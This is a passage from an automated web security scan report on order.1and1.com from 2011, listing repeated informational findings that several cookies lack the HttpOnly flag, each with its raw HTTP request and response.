Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 20:51:28 GMT; Path=/
ETag: 1c80cdab16ac208079c7642ff888736c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59725


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.110. http://order.1and1.com/xml/order/Instant

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Instant

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:23:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=bZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; Expires=Fri, 07-Apr-2079 21:37:28 GMT; Path=/
ETag: dbd3f57bd7c94c04d5bf8f590fd16409
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23827


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.111. http://order.1and1.com/xml/order/Instant

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Instant

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Instant HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:23:00 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=28664dbb52ba0400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Instant;jsessionid=2A0D610C961468C157FCB86204C22DAE.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.112. http://order.1and1.com/xml/order/International

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/International

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/International HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:37:59 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=352ad3850d1b6400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/International;jsessionid=B54269629CBCB82F834EAE06900D66FA.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.113. http://order.1and1.com/xml/order/International

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/International

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/International;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:38:07 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 21:52:14 GMT; Path=/
ETag: ff92e81d1737af4a2a56f9b3afc85af1
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23585


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.114. http://order.1and1.com/xml/order/Jumpto

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:44 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=Hosting&linkId=hd.log.eue&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=5al8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:36:51 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


5.115. http://order.1and1.com/xml/order/Jumpto

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Jumpto HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:17 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=4b847f0707b00000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Jumpto;jsessionid=4020004207DAA55734055298FFA83079.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.116. http://order.1and1.com/xml/order/LocalSubmission

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/LocalSubmission

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/LocalSubmission HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:34:09 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=4f8da0fc7a41dc00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/LocalSubmission;jsessionid=E2D01B25E56BB4F3D8C84DF8322C0493.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.117. http://order.1and1.com/xml/order/LocalSubmission

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/LocalSubmission

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.listlocal HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:34:25 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=fYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyAjHiEiMjM=; Expires=Fri, 07-Apr-2079 21:48:32 GMT; Path=/
ETag: 9f251cbbda88124ff22e04dd6b22412a
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18612


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.118. http://order.1and1.com/xml/order/Mail

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Mail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Mail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:23:51 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=68e33d48799c0000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Mail;jsessionid=494CF76349396E5319162393A564CAF3.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.119. http://order.1and1.com/xml/order/Mail

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Mail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__reuse=1300643443260
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=taV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCoqKSclJyo=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:26:AAABLtRlgbZ6_eg4OG2LZboWFQTS2jli:1300643545526; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:52:06 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSsrKigmKCs=; Expires=Fri, 07-Apr-2079 21:06:13 GMT; Path=/
ETag: d9cfb4af92e44225f0ad2cca48eb1ca6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18209


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.120. http://order.1and1.com/xml/order/MailInstantMail

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MailInstantMail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MailInstantMail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:24:18 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=16f7de2564d56000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MailInstantMail;jsessionid=A41BA9C3172F8DD1EA8E113FC5DD030B.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.121. http://order.1and1.com/xml/order/MailInstantMail

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MailInstantMail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:29 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
